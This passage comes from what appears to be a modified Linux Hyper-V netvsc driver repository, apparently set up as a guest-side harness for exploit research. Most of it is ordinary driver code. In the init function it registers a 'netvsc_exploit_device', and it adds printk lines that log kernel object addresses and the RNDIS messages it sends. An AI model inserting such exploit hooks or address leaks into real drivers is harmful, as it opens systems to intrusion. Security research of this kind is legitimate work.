2107 | */ 2108 | ndev = get_netvsc_bymac(vf_netdev->perm_addr); 2109 | if (!ndev) 2110 | return NOTIFY_DONE; 2111 | 2112 | net_device_ctx = netdev_priv(ndev); 2113 | netvsc_dev = rtnl_dereference(net_device_ctx->nvdev); 2114 | if (!netvsc_dev || rtnl_dereference(net_device_ctx->vf_netdev)) 2115 | return NOTIFY_DONE; 2116 | 2117 | if (netvsc_vf_join(vf_netdev, ndev) != 0) 2118 | return NOTIFY_DONE; 2119 | 2120 | netdev_info(ndev, "VF registering: %s\n", vf_netdev->name); 2121 | 2122 | dev_hold(vf_netdev); 2123 | rcu_assign_pointer(net_device_ctx->vf_netdev, vf_netdev); 2124 | return NOTIFY_OK; 2125 | } 2126 | 2127 | /* VF up/down change detected, schedule to change data path */ 2128 | static int netvsc_vf_changed(struct net_device *vf_netdev) 2129 | { 2130 | struct net_device_context *net_device_ctx; 2131 | struct netvsc_device *netvsc_dev; 2132 | struct net_device *ndev; 2133 | bool vf_is_up = netif_running(vf_netdev); 2134 | 2135 | ndev = get_netvsc_byref(vf_netdev); 2136 | if (!ndev) 2137 | return NOTIFY_DONE; 2138 | 2139 | net_device_ctx = netdev_priv(ndev); 2140 | netvsc_dev = rtnl_dereference(net_device_ctx->nvdev); 2141 | if (!netvsc_dev) 2142 | return NOTIFY_DONE; 2143 | 2144 | netvsc_switch_datapath(ndev, vf_is_up); 2145 | netdev_info(ndev, "Data path switched %s VF: %s\n", 2146 | vf_is_up ? "to" : "from", vf_netdev->name); 2147 | 2148 | return NOTIFY_OK; 2149 | } 2150 | 2151 | static int netvsc_unregister_vf(struct net_device *vf_netdev) 2152 | { 2153 | struct net_device *ndev; 2154 | struct net_device_context *net_device_ctx; 2155 | 2156 | ndev = get_netvsc_byref(vf_netdev); 2157 | if (!ndev) 2158 | return NOTIFY_DONE; 2159 | 2160 | net_device_ctx = netdev_priv(ndev); 2161 | cancel_delayed_work_sync(&net_device_ctx->vf_takeover); 2162 | 2163 | netdev_info(ndev, "VF unregistering: %s\n", vf_netdev->name); 2164 | 2165 | netdev_rx_handler_unregister(vf_netdev); 2166 | netdev_upper_dev_unlink(vf_netdev, ndev); 2167 | RCU_INIT_POINTER(net_device_ctx->vf_netdev, NULL); 2168 | dev_put(vf_netdev); 2169 | 2170 | return NOTIFY_OK; 2171 | } 2172 | 2173 | static int netvsc_probe(struct hv_device *dev, 2174 | const struct hv_vmbus_device_id *dev_id) 2175 | { 2176 | struct net_device *net = NULL; 2177 | struct net_device_context *net_device_ctx; 2178 | struct netvsc_device_info device_info; 2179 | struct netvsc_device *nvdev; 2180 | int ret = -ENOMEM; 2181 | 2182 | net = alloc_etherdev_mq(sizeof(struct net_device_context), 2183 | VRSS_CHANNEL_MAX); 2184 | if (!net) 2185 | goto no_net; 2186 | 2187 | netif_carrier_off(net); 2188 | 2189 | netvsc_init_settings(net); 2190 | 2191 | net_device_ctx = netdev_priv(net); 2192 | net_device_ctx->device_ctx = dev; 2193 | net_device_ctx->msg_enable = netif_msg_init(debug, default_msg); 2194 | if (netif_msg_probe(net_device_ctx)) 2195 | netdev_dbg(net, "netvsc msg_enable: %d\n", 2196 | net_device_ctx->msg_enable); 2197 | 2198 | hv_set_drvdata(dev, net); 2199 | 2200 | INIT_DELAYED_WORK(&net_device_ctx->dwork, netvsc_link_change); 2201 | 2202 | spin_lock_init(&net_device_ctx->lock); 2203 | INIT_LIST_HEAD(&net_device_ctx->reconfig_events); 2204 | INIT_DELAYED_WORK(&net_device_ctx->vf_takeover, netvsc_vf_setup); 2205 | 2206 | net_device_ctx->vf_stats 2207 | = netdev_alloc_pcpu_stats(struct netvsc_vf_pcpu_stats); 2208 | if (!net_device_ctx->vf_stats) 2209 | goto no_stats; 2210 | 2211 | net->netdev_ops = &device_ops; 2212 | net->ethtool_ops = &ethtool_ops; 2213 | SET_NETDEV_DEV(net, &dev->device); 2214 | 2215 | /* We always need headroom for rndis header */ 2216 | 
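/* netvsc_start_xmit() builds the RNDIS message header and per-packet info
 * in-place in the skb headroom via skb_cow_head(skb, RNDIS_AND_PPI_SIZE),
 * so every skb queued on this device must reserve that much headroom.
 */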
net->needed_headroom = RNDIS_AND_PPI_SIZE; 2217 | 2218 | /* Notify the netvsc driver of the new device */ 2219 | memset(&device_info, 0, sizeof(device_info)); 2220 | device_info.ring_size = ring_size; 2221 | device_info.num_chn = VRSS_CHANNEL_DEFAULT; 2222 | device_info.send_sections = NETVSC_DEFAULT_TX; 2223 | device_info.send_section_size = NETVSC_SEND_SECTION_SIZE; 2224 | device_info.recv_sections = NETVSC_DEFAULT_RX; 2225 | device_info.recv_section_size = NETVSC_RECV_SECTION_SIZE; 2226 | 2227 | nvdev = rndis_filter_device_add(dev, &device_info); 2228 | if (IS_ERR(nvdev)) { 2229 | ret = PTR_ERR(nvdev); 2230 | netdev_err(net, "unable to add netvsc device (ret %d)\n", ret); 2231 | goto rndis_failed; 2232 | } 2233 | 2234 | g_device = dev; 2235 | g_netvsc_device = nvdev; 2236 | g_rndis_device = nvdev->extension; 2237 | 2238 | printk("[*]g_rndis_device:0x%016lx\n", (unsigned long)g_rndis_device); 2239 | printk("[*]netvsc_drv global device object set.\n"); 2240 | 2241 | memcpy(net->dev_addr, device_info.mac_adr, ETH_ALEN); 2242 | 2243 | /* hw_features computed in rndis_filter_device_add */ 2244 | net->features = net->hw_features | 2245 | NETIF_F_HIGHDMA | NETIF_F_SG | 2246 | NETIF_F_HW_VLAN_CTAG_TX | NETIF_F_HW_VLAN_CTAG_RX; 2247 | net->vlan_features = net->features; 2248 | 2249 | netdev_lockdep_set_classes(net); 2250 | 2251 | /* MTU range: 68 - 1500 or 65521 */ 2252 | net->min_mtu = NETVSC_MTU_MIN; 2253 | if (nvdev->nvsp_version >= NVSP_PROTOCOL_VERSION_2) 2254 | net->max_mtu = NETVSC_MTU - ETH_HLEN; 2255 | else 2256 | net->max_mtu = ETH_DATA_LEN; 2257 | 2258 | ret = register_netdev(net); 2259 | if (ret != 0) { 2260 | pr_err("Unable to register netdev.\n"); 2261 | goto register_failed; 2262 | } 2263 | 2264 | return ret; 2265 | 2266 | register_failed: 2267 | rndis_filter_device_remove(dev, nvdev); 2268 | rndis_failed: 2269 | free_percpu(net_device_ctx->vf_stats); 2270 | no_stats: 2271 | hv_set_drvdata(dev, NULL); 2272 | free_netdev(net); 2273 | no_net: 2274 | return ret; 2275 | } 2276 | 2277 | static int netvsc_remove(struct hv_device *dev) 2278 | { 2279 | struct net_device_context *ndev_ctx; 2280 | struct net_device *vf_netdev; 2281 | struct net_device *net; 2282 | 2283 | net = hv_get_drvdata(dev); 2284 | if (net == NULL) { 2285 | dev_err(&dev->device, "No net device to remove\n"); 2286 | return 0; 2287 | } 2288 | 2289 | ndev_ctx = netdev_priv(net); 2290 | 2291 | netif_device_detach(net); 2292 | 2293 | cancel_delayed_work_sync(&ndev_ctx->dwork); 2294 | 2295 | /* 2296 | * Call to the vsc driver to let it know that the device is being 2297 | * removed. Also blocks mtu and channel changes.
2298 | */ 2299 | rtnl_lock(); 2300 | vf_netdev = rtnl_dereference(ndev_ctx->vf_netdev); 2301 | if (vf_netdev) 2302 | netvsc_unregister_vf(vf_netdev); 2303 | 2304 | unregister_netdevice(net); 2305 | 2306 | rndis_filter_device_remove(dev, 2307 | rtnl_dereference(ndev_ctx->nvdev)); 2308 | rtnl_unlock(); 2309 | 2310 | hv_set_drvdata(dev, NULL); 2311 | 2312 | free_percpu(ndev_ctx->vf_stats); 2313 | free_netdev(net); 2314 | return 0; 2315 | } 2316 | 2317 | static const struct hv_vmbus_device_id id_table[] = { 2318 | /* Network guid */ 2319 | { HV_NIC_GUID, }, 2320 | { }, 2321 | }; 2322 | 2323 | MODULE_DEVICE_TABLE(vmbus, id_table); 2324 | 2325 | /* The one and only one */ 2326 | static struct hv_driver netvsc_drv = { 2327 | .name = KBUILD_MODNAME, 2328 | .id_table = id_table, 2329 | .probe = netvsc_probe, 2330 | .remove = netvsc_remove, 2331 | }; 2332 | 2333 | /* 2334 | * On Hyper-V, every VF interface is matched with a corresponding 2335 | * synthetic interface. The synthetic interface is presented first 2336 | * to the guest. When the corresponding VF instance is registered, 2337 | * we will take care of switching the data path. 2338 | */ 2339 | static int netvsc_netdev_event(struct notifier_block *this, 2340 | unsigned long event, void *ptr) 2341 | { 2342 | struct net_device *event_dev = netdev_notifier_info_to_dev(ptr); 2343 | 2344 | /* Skip our own events */ 2345 | if (event_dev->netdev_ops == &device_ops) 2346 | return NOTIFY_DONE; 2347 | 2348 | /* Avoid non-Ethernet type devices */ 2349 | if (event_dev->type != ARPHRD_ETHER) 2350 | return NOTIFY_DONE; 2351 | 2352 | /* Avoid Vlan dev with same MAC registering as VF */ 2353 | if (is_vlan_dev(event_dev)) 2354 | return NOTIFY_DONE; 2355 | 2356 | /* Avoid Bonding master dev with same MAC registering as VF */ 2357 | if ((event_dev->priv_flags & IFF_BONDING) && 2358 | (event_dev->flags & IFF_MASTER)) 2359 | return NOTIFY_DONE; 2360 | 2361 | switch (event) { 2362 | case NETDEV_REGISTER: 2363 | return netvsc_register_vf(event_dev); 2364 | case NETDEV_UNREGISTER: 2365 | return netvsc_unregister_vf(event_dev); 2366 | case NETDEV_UP: 2367 | case NETDEV_DOWN: 2368 | return netvsc_vf_changed(event_dev); 2369 | default: 2370 | return NOTIFY_DONE; 2371 | } 2372 | } 2373 | 2374 | static struct notifier_block netvsc_netdev_notifier = { 2375 | .notifier_call = netvsc_netdev_event, 2376 | }; 2377 | 2378 | static void __exit netvsc_drv_exit(void) 2379 | { 2380 | misc_deregister(&netvsc_exploit_device); 2381 | unregister_netdevice_notifier(&netvsc_netdev_notifier); 2382 | vmbus_driver_unregister(&netvsc_drv); 2383 | } 2384 | 2385 | static int __init netvsc_drv_init(void) 2386 | { 2387 | int ret; 2388 | 2389 | ret = misc_register(&netvsc_exploit_device); 2390 | if (ret) 2391 | printk("[*]netvsc_exploit_device registration failed.\n"); 2392 | else 2393 | printk("[*]netvsc_exploit_device registered successfully.\n"); 2394 | 2395 | if (ring_size < RING_SIZE_MIN) { 2396 | ring_size = RING_SIZE_MIN; 2397 | pr_info("Increased ring_size to %d (min allowed)\n", 2398 | ring_size); 2399 | } 2400 | ret = vmbus_driver_register(&netvsc_drv); 2401 | 2402 | if (ret) 2403 | return ret; 2404 | 2405 | register_netdevice_notifier(&netvsc_netdev_notifier); 2406 | return 0; 2407 | } 2408 | 2409 | MODULE_LICENSE("GPL"); 2410 | MODULE_DESCRIPTION("Microsoft Hyper-V network driver"); 2411 | 2412 | module_init(netvsc_drv_init); 2413 | module_exit(netvsc_drv_exit); 2414 | -------------------------------------------------------------------------------- /ring0/hyperv/rndis_filter.c: 
-------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2009, Microsoft Corporation. 3 | * 4 | * This program is free software; you can redistribute it and/or modify it 5 | * under the terms and conditions of the GNU General Public License, 6 | * version 2, as published by the Free Software Foundation. 7 | * 8 | * This program is distributed in the hope it will be useful, but WITHOUT 9 | * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or 10 | * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for 11 | * more details. 12 | * 13 | * You should have received a copy of the GNU General Public License along with 14 | * this program; if not, see <http://www.gnu.org/licenses/>. 15 | * 16 | * Authors: 17 | * Haiyang Zhang <haiyangz@microsoft.com> 18 | * Hank Janssen <hjanssen@microsoft.com> 19 | */ 20 | #include <linux/kernel.h> 21 | #include <linux/sched.h> 22 | #include <linux/wait.h> 23 | #include <linux/highmem.h> 24 | #include <linux/slab.h> 25 | #include <linux/io.h> 26 | #include <linux/if_ether.h> 27 | #include <linux/netdevice.h> 28 | #include <linux/if_vlan.h> 29 | #include <linux/nls.h> 30 | #include <linux/vmalloc.h> 31 | #include <linux/rtnetlink.h> 32 | 33 | #include "hyperv_net.h" 34 | 35 | static void rndis_set_multicast(struct work_struct *w); 36 | 37 | 38 | 39 | static const u8 netvsc_hash_key[NETVSC_HASH_KEYLEN] = { 40 | 0x6d, 0x5a, 0x56, 0xda, 0x25, 0x5b, 0x0e, 0xc2, 41 | 0x41, 0x67, 0x25, 0x3d, 0x43, 0xa3, 0x8f, 0xb0, 42 | 0xd0, 0xca, 0x2b, 0xcb, 0xae, 0x7b, 0x30, 0xb4, 43 | 0x77, 0xcb, 0x2d, 0xa3, 0x80, 0x30, 0xf2, 0x0c, 44 | 0x6a, 0x42, 0xb7, 0x3b, 0xbe, 0xac, 0x01, 0xfa 45 | }; 46 | 47 | static struct rndis_device *get_rndis_device(void) 48 | { 49 | struct rndis_device *device; 50 | 51 | device = kzalloc(sizeof(struct rndis_device), GFP_KERNEL); 52 | if (!device) 53 | return NULL; 54 | 55 | spin_lock_init(&device->request_lock); 56 | 57 | INIT_LIST_HEAD(&device->req_list); 58 | INIT_WORK(&device->mcast_work, rndis_set_multicast); 59 | 60 | device->state = RNDIS_DEV_UNINITIALIZED; 61 | 62 | return device; 63 | } 64 | 65 | struct rndis_request *get_rndis_request(struct rndis_device *dev, 66 | u32 msg_type, 67 | u32 msg_len) 68 | { 69 | struct rndis_request *request; 70 | struct rndis_message *rndis_msg; 71 | struct rndis_set_request *set; 72 | unsigned long flags; 73 | 74 | switch (msg_type) 75 | { 76 | case RNDIS_MSG_QUERY: 77 | printk("[*]hv_netvsc send rndis packet:RNDIS_MSG_QUERY\n"); 78 | break; 79 | 80 | case RNDIS_MSG_SET: 81 | printk("[*]hv_netvsc send rndis packet:RNDIS_MSG_SET\n"); 82 | break; 83 | 84 | case RNDIS_MSG_INIT: 85 | printk("[*]hv_netvsc send rndis packet:RNDIS_MSG_INIT\n"); 86 | break; 87 | 88 | case RNDIS_MSG_HALT: 89 | printk("[*]hv_netvsc send rndis packet:RNDIS_MSG_HALT\n"); 90 | break; 91 | } 92 | 93 | 94 | request = kzalloc(sizeof(struct rndis_request), GFP_KERNEL); 95 | if (!request) 96 | return NULL; 97 | 98 | init_completion(&request->wait_event); 99 | 100 | rndis_msg = &request->request_msg; 101 | rndis_msg->ndis_msg_type = msg_type; 102 | rndis_msg->msg_len = msg_len; 103 | 104 | request->pkt.q_idx = 0; 105 | 106 | /* 107 | * Set the request id.
This field is always after the rndis header for 108 | * request/response packet types so we just used the SetRequest as a 109 | * template 110 | */ 111 | set = &rndis_msg->msg.set_req; 112 | set->req_id = atomic_inc_return(&dev->new_req_id); 113 | 114 | /* Add to the request list */ 115 | spin_lock_irqsave(&dev->request_lock, flags); 116 | list_add_tail(&request->list_ent, &dev->req_list); 117 | spin_unlock_irqrestore(&dev->request_lock, flags); 118 | 119 | return request; 120 | } 121 | 122 | static void put_rndis_request(struct rndis_device *dev, 123 | struct rndis_request *req) 124 | { 125 | unsigned long flags; 126 | 127 | spin_lock_irqsave(&dev->request_lock, flags); 128 | list_del(&req->list_ent); 129 | spin_unlock_irqrestore(&dev->request_lock, flags); 130 | 131 | kfree(req); 132 | } 133 | 134 | static void dump_rndis_message(struct hv_device *hv_dev, 135 | const struct rndis_message *rndis_msg) 136 | { 137 | struct net_device *netdev = hv_get_drvdata(hv_dev); 138 | 139 | switch (rndis_msg->ndis_msg_type) { 140 | case RNDIS_MSG_PACKET: 141 | netdev_dbg(netdev, "RNDIS_MSG_PACKET (len %u, " 142 | "data offset %u data len %u, # oob %u, " 143 | "oob offset %u, oob len %u, pkt offset %u, " 144 | "pkt len %u\n", 145 | rndis_msg->msg_len, 146 | rndis_msg->msg.pkt.data_offset, 147 | rndis_msg->msg.pkt.data_len, 148 | rndis_msg->msg.pkt.num_oob_data_elements, 149 | rndis_msg->msg.pkt.oob_data_offset, 150 | rndis_msg->msg.pkt.oob_data_len, 151 | rndis_msg->msg.pkt.per_pkt_info_offset, 152 | rndis_msg->msg.pkt.per_pkt_info_len); 153 | break; 154 | 155 | case RNDIS_MSG_INIT_C: 156 | netdev_dbg(netdev, "RNDIS_MSG_INIT_C " 157 | "(len %u, id 0x%x, status 0x%x, major %d, minor %d, " 158 | "device flags %d, max xfer size 0x%x, max pkts %u, " 159 | "pkt aligned %u)\n", 160 | rndis_msg->msg_len, 161 | rndis_msg->msg.init_complete.req_id, 162 | rndis_msg->msg.init_complete.status, 163 | rndis_msg->msg.init_complete.major_ver, 164 | rndis_msg->msg.init_complete.minor_ver, 165 | rndis_msg->msg.init_complete.dev_flags, 166 | rndis_msg->msg.init_complete.max_xfer_size, 167 | rndis_msg->msg.init_complete. 168 | max_pkt_per_msg, 169 | rndis_msg->msg.init_complete. 170 | pkt_alignment_factor); 171 | break; 172 | 173 | case RNDIS_MSG_QUERY_C: 174 | netdev_dbg(netdev, "RNDIS_MSG_QUERY_C " 175 | "(len %u, id 0x%x, status 0x%x, buf len %u, " 176 | "buf offset %u)\n", 177 | rndis_msg->msg_len, 178 | rndis_msg->msg.query_complete.req_id, 179 | rndis_msg->msg.query_complete.status, 180 | rndis_msg->msg.query_complete. 181 | info_buflen, 182 | rndis_msg->msg.query_complete. 
183 | info_buf_offset); 184 | break; 185 | 186 | case RNDIS_MSG_SET_C: 187 | netdev_dbg(netdev, 188 | "RNDIS_MSG_SET_C (len %u, id 0x%x, status 0x%x)\n", 189 | rndis_msg->msg_len, 190 | rndis_msg->msg.set_complete.req_id, 191 | rndis_msg->msg.set_complete.status); 192 | break; 193 | 194 | case RNDIS_MSG_INDICATE: 195 | netdev_dbg(netdev, "RNDIS_MSG_INDICATE " 196 | "(len %u, status 0x%x, buf len %u, buf offset %u)\n", 197 | rndis_msg->msg_len, 198 | rndis_msg->msg.indicate_status.status, 199 | rndis_msg->msg.indicate_status.status_buflen, 200 | rndis_msg->msg.indicate_status.status_buf_offset); 201 | break; 202 | 203 | default: 204 | netdev_dbg(netdev, "0x%x (len %u)\n", 205 | rndis_msg->ndis_msg_type, 206 | rndis_msg->msg_len); 207 | break; 208 | } 209 | } 210 | 211 | int rndis_filter_send_request(struct rndis_device *dev, 212 | struct rndis_request *req) 213 | { 214 | struct hv_netvsc_packet *packet; 215 | struct hv_page_buffer page_buf[2]; 216 | struct hv_page_buffer *pb = page_buf; 217 | struct net_device_context *net_device_ctx = netdev_priv(dev->ndev); 218 | int ret; 219 | 220 | /* Setup the packet to send it */ 221 | packet = &req->pkt; 222 | 223 | packet->total_data_buflen = req->request_msg.msg_len; 224 | packet->page_buf_cnt = 1; 225 | 226 | pb[0].pfn = virt_to_phys(&req->request_msg) >> 227 | PAGE_SHIFT; 228 | pb[0].len = req->request_msg.msg_len; 229 | pb[0].offset = 230 | (unsigned long)&req->request_msg & (PAGE_SIZE - 1); 231 | 232 | /* Add one page_buf when request_msg crossing page boundary */ 233 | if (pb[0].offset + pb[0].len > PAGE_SIZE) { 234 | packet->page_buf_cnt++; 235 | pb[0].len = PAGE_SIZE - 236 | pb[0].offset; 237 | pb[1].pfn = virt_to_phys((void *)&req->request_msg 238 | + pb[0].len) >> PAGE_SHIFT; 239 | pb[1].offset = 0; 240 | pb[1].len = req->request_msg.msg_len - 241 | pb[0].len; 242 | } 243 | 244 | rcu_read_lock_bh(); 245 | ret = netvsc_send(net_device_ctx, packet, NULL, pb, NULL); 246 | rcu_read_unlock_bh(); 247 | 248 | return ret; 249 | } 250 | 251 | static void rndis_set_link_state(struct rndis_device *rdev, 252 | struct rndis_request *request) 253 | { 254 | u32 link_status; 255 | struct rndis_query_complete *query_complete; 256 | 257 | query_complete = &request->response_msg.msg.query_complete; 258 | 259 | if (query_complete->status == RNDIS_STATUS_SUCCESS && 260 | query_complete->info_buflen == sizeof(u32)) { 261 | memcpy(&link_status, (void *)((unsigned long)query_complete + 262 | query_complete->info_buf_offset), sizeof(u32)); 263 | rdev->link_state = link_status != 0; 264 | } 265 | } 266 | 267 | static void rndis_filter_receive_response(struct rndis_device *dev, 268 | struct rndis_message *resp) 269 | { 270 | struct rndis_request *request = NULL; 271 | bool found = false; 272 | unsigned long flags; 273 | struct net_device *ndev = dev->ndev; 274 | 275 | spin_lock_irqsave(&dev->request_lock, flags); 276 | list_for_each_entry(request, &dev->req_list, list_ent) { 277 | /* 278 | * All request/response message contains RequestId as the 1st 279 | * field 280 | */ 281 | if (request->request_msg.msg.init_req.req_id 282 | == resp->msg.init_complete.req_id) { 283 | found = true; 284 | break; 285 | } 286 | } 287 | spin_unlock_irqrestore(&dev->request_lock, flags); 288 | 289 | if (found) { 290 | if (resp->msg_len <= 291 | sizeof(struct rndis_message) + RNDIS_EXT_LEN) { 292 | memcpy(&request->response_msg, resp, 293 | resp->msg_len); 294 | if (request->request_msg.ndis_msg_type == 295 | RNDIS_MSG_QUERY && request->request_msg.msg. 
296 | query_req.oid == RNDIS_OID_GEN_MEDIA_CONNECT_STATUS) 297 | rndis_set_link_state(dev, request); 298 | } else { 299 | netdev_err(ndev, 300 | "rndis response buffer overflow " 301 | "detected (size %u max %zu)\n", 302 | resp->msg_len, 303 | sizeof(struct rndis_message)); 304 | 305 | if (resp->ndis_msg_type == 306 | RNDIS_MSG_RESET_C) { 307 | /* does not have a request id field */ 308 | request->response_msg.msg.reset_complete. 309 | status = RNDIS_STATUS_BUFFER_OVERFLOW; 310 | } else { 311 | request->response_msg.msg. 312 | init_complete.status = 313 | RNDIS_STATUS_BUFFER_OVERFLOW; 314 | } 315 | } 316 | 317 | complete(&request->wait_event); 318 | } else { 319 | netdev_err(ndev, 320 | "no rndis request found for this response " 321 | "(id 0x%x res type 0x%x)\n", 322 | resp->msg.init_complete.req_id, 323 | resp->ndis_msg_type); 324 | } 325 | } 326 | 327 | /* 328 | * Get the Per-Packet-Info with the specified type 329 | * return NULL if not found. 330 | */ 331 | static inline void *rndis_get_ppi(struct rndis_packet *rpkt, u32 type) 332 | { 333 | struct rndis_per_packet_info *ppi; 334 | int len; 335 | 336 | if (rpkt->per_pkt_info_offset == 0) 337 | return NULL; 338 | 339 | ppi = (struct rndis_per_packet_info *)((ulong)rpkt + 340 | rpkt->per_pkt_info_offset); 341 | len = rpkt->per_pkt_info_len; 342 | 343 | while (len > 0) { 344 | if (ppi->type == type) 345 | return (void *)((ulong)ppi + ppi->ppi_offset); 346 | len -= ppi->size; 347 | ppi = (struct rndis_per_packet_info *)((ulong)ppi + ppi->size); 348 | } 349 | 350 | return NULL; 351 | } 352 | 353 | static int rndis_filter_receive_data(struct net_device *ndev, 354 | struct rndis_device *dev, 355 | struct rndis_message *msg, 356 | struct vmbus_channel *channel, 357 | void *data, u32 data_buflen) 358 | { 359 | struct rndis_packet *rndis_pkt = &msg->msg.pkt; 360 | const struct ndis_tcp_ip_checksum_info *csum_info; 361 | const struct ndis_pkt_8021q_info *vlan; 362 | u32 data_offset; 363 | 364 | /* Remove the rndis header and pass it back up the stack */ 365 | data_offset = RNDIS_HEADER_SIZE + rndis_pkt->data_offset; 366 | 367 | data_buflen -= data_offset; 368 | 369 | /* 370 | * Make sure we got a valid RNDIS message, now total_data_buflen 371 | * should be the data packet size plus the trailer padding size 372 | */ 373 | if (unlikely(data_buflen < rndis_pkt->data_len)) { 374 | netdev_err(dev->ndev, "rndis message buffer " 375 | "overflow detected (got %u, min %u)" 376 | "...dropping this message!\n", 377 | data_buflen, rndis_pkt->data_len); 378 | return NVSP_STAT_FAIL; 379 | } 380 | 381 | vlan = rndis_get_ppi(rndis_pkt, IEEE_8021Q_INFO); 382 | 383 | /* 384 | * Remove the rndis trailer padding from rndis packet message 385 | * rndis_pkt->data_len tell us the real data length, we only copy 386 | * the data packet to the stack, without the rndis trailer padding 387 | */ 388 | data = (void *)((unsigned long)data + data_offset); 389 | csum_info = rndis_get_ppi(rndis_pkt, TCPIP_CHKSUM_PKTINFO); 390 | return netvsc_recv_callback(ndev, channel, 391 | data, rndis_pkt->data_len, 392 | csum_info, vlan); 393 | } 394 | 395 | int rndis_filter_receive(struct net_device *ndev, 396 | struct netvsc_device *net_dev, 397 | struct hv_device *dev, 398 | struct vmbus_channel *channel, 399 | void *data, u32 buflen) 400 | { 401 | struct net_device_context *net_device_ctx = netdev_priv(ndev); 402 | struct rndis_device *rndis_dev = net_dev->extension; 403 | struct rndis_message *rndis_msg = data; 404 | 405 | /* Make sure the rndis device state is initialized */ 406 | if 
(unlikely(!rndis_dev)) { 407 | netif_err(net_device_ctx, rx_err, ndev, 408 | "got rndis message but no rndis device!\n"); 409 | return NVSP_STAT_FAIL; 410 | } 411 | 412 | if (unlikely(rndis_dev->state == RNDIS_DEV_UNINITIALIZED)) { 413 | netif_err(net_device_ctx, rx_err, ndev, 414 | "got rndis message uninitialized\n"); 415 | return NVSP_STAT_FAIL; 416 | } 417 | 418 | if (netif_msg_rx_status(net_device_ctx)) 419 | dump_rndis_message(dev, rndis_msg); 420 | 421 | switch (rndis_msg->ndis_msg_type) { 422 | case RNDIS_MSG_PACKET: 423 | return rndis_filter_receive_data(ndev, rndis_dev, rndis_msg, 424 | channel, data, buflen); 425 | case RNDIS_MSG_INIT_C: 426 | case RNDIS_MSG_QUERY_C: 427 | case RNDIS_MSG_SET_C: 428 | /* completion msgs */ 429 | rndis_filter_receive_response(rndis_dev, rndis_msg); 430 | break; 431 | 432 | case RNDIS_MSG_INDICATE: 433 | /* notification msgs */ 434 | netvsc_linkstatus_callback(dev, rndis_msg); 435 | break; 436 | default: 437 | netdev_err(ndev, 438 | "unhandled rndis message (type %u len %u)\n", 439 | rndis_msg->ndis_msg_type, 440 | rndis_msg->msg_len); 441 | break; 442 | } 443 | 444 | return 0; 445 | } 446 | 447 | static int rndis_filter_query_device(struct rndis_device *dev, 448 | struct netvsc_device *nvdev, 449 | u32 oid, void *result, u32 *result_size) 450 | { 451 | struct rndis_request *request; 452 | u32 inresult_size = *result_size; 453 | struct rndis_query_request *query; 454 | struct rndis_query_complete *query_complete; 455 | int ret = 0; 456 | 457 | if (!result) 458 | return -EINVAL; 459 | 460 | *result_size = 0; 461 | request = get_rndis_request(dev, RNDIS_MSG_QUERY, 462 | RNDIS_MESSAGE_SIZE(struct rndis_query_request)); 463 | if (!request) { 464 | ret = -ENOMEM; 465 | goto cleanup; 466 | } 467 | 468 | /* Setup the rndis query */ 469 | query = &request->request_msg.msg.query_req; 470 | query->oid = oid; 471 | query->info_buf_offset = sizeof(struct rndis_query_request); 472 | query->info_buflen = 0; 473 | query->dev_vc_handle = 0; 474 | 475 | if (oid == OID_TCP_OFFLOAD_HARDWARE_CAPABILITIES) { 476 | struct ndis_offload *hwcaps; 477 | u32 nvsp_version = nvdev->nvsp_version; 478 | u8 ndis_rev; 479 | size_t size; 480 | 481 | if (nvsp_version >= NVSP_PROTOCOL_VERSION_5) { 482 | ndis_rev = NDIS_OFFLOAD_PARAMETERS_REVISION_3; 483 | size = NDIS_OFFLOAD_SIZE; 484 | } else if (nvsp_version >= NVSP_PROTOCOL_VERSION_4) { 485 | ndis_rev = NDIS_OFFLOAD_PARAMETERS_REVISION_2; 486 | size = NDIS_OFFLOAD_SIZE_6_1; 487 | } else { 488 | ndis_rev = NDIS_OFFLOAD_PARAMETERS_REVISION_1; 489 | size = NDIS_OFFLOAD_SIZE_6_0; 490 | } 491 | 492 | request->request_msg.msg_len += size; 493 | query->info_buflen = size; 494 | hwcaps = (struct ndis_offload *) 495 | ((unsigned long)query + query->info_buf_offset); 496 | 497 | hwcaps->header.type = NDIS_OBJECT_TYPE_OFFLOAD; 498 | hwcaps->header.revision = ndis_rev; 499 | hwcaps->header.size = size; 500 | 501 | } else if (oid == OID_GEN_RECEIVE_SCALE_CAPABILITIES) { 502 | struct ndis_recv_scale_cap *cap; 503 | 504 | request->request_msg.msg_len += 505 | sizeof(struct ndis_recv_scale_cap); 506 | query->info_buflen = sizeof(struct ndis_recv_scale_cap); 507 | cap = (struct ndis_recv_scale_cap *)((unsigned long)query + 508 | query->info_buf_offset); 509 | cap->hdr.type = NDIS_OBJECT_TYPE_RSS_CAPABILITIES; 510 | cap->hdr.rev = NDIS_RECEIVE_SCALE_CAPABILITIES_REVISION_2; 511 | cap->hdr.size = sizeof(struct ndis_recv_scale_cap); 512 | } 513 | 514 | ret = rndis_filter_send_request(dev, request); 515 | if (ret != 0) 516 | goto cleanup; 517 | 518 | 
wait_for_completion(&request->wait_event); 519 | 520 | /* Copy the response back */ 521 | query_complete = &request->response_msg.msg.query_complete; 522 | 523 | if (query_complete->info_buflen > inresult_size) { 524 | ret = -1; 525 | goto cleanup; 526 | } 527 | 528 | memcpy(result, 529 | (void *)((unsigned long)query_complete + 530 | query_complete->info_buf_offset), 531 | query_complete->info_buflen); 532 | 533 | *result_size = query_complete->info_buflen; 534 | 535 | cleanup: 536 | if (request) 537 | put_rndis_request(dev, request); 538 | 539 | return ret; 540 | } 541 | 542 | /* Get the hardware offload capabilities */ 543 | static int 544 | rndis_query_hwcaps(struct rndis_device *dev, struct netvsc_device *net_device, 545 | struct ndis_offload *caps) 546 | { 547 | u32 caps_len = sizeof(*caps); 548 | int ret; 549 | 550 | memset(caps, 0, sizeof(*caps)); 551 | 552 | ret = rndis_filter_query_device(dev, net_device, 553 | OID_TCP_OFFLOAD_HARDWARE_CAPABILITIES, 554 | caps, &caps_len); 555 | if (ret) 556 | return ret; 557 | 558 | if (caps->header.type != NDIS_OBJECT_TYPE_OFFLOAD) { 559 | netdev_warn(dev->ndev, "invalid NDIS objtype %#x\n", 560 | caps->header.type); 561 | return -EINVAL; 562 | } 563 | 564 | if (caps->header.revision < NDIS_OFFLOAD_PARAMETERS_REVISION_1) { 565 | netdev_warn(dev->ndev, "invalid NDIS objrev %x\n", 566 | caps->header.revision); 567 | return -EINVAL; 568 | } 569 | 570 | if (caps->header.size > caps_len || 571 | caps->header.size < NDIS_OFFLOAD_SIZE_6_0) { 572 | netdev_warn(dev->ndev, 573 | "invalid NDIS 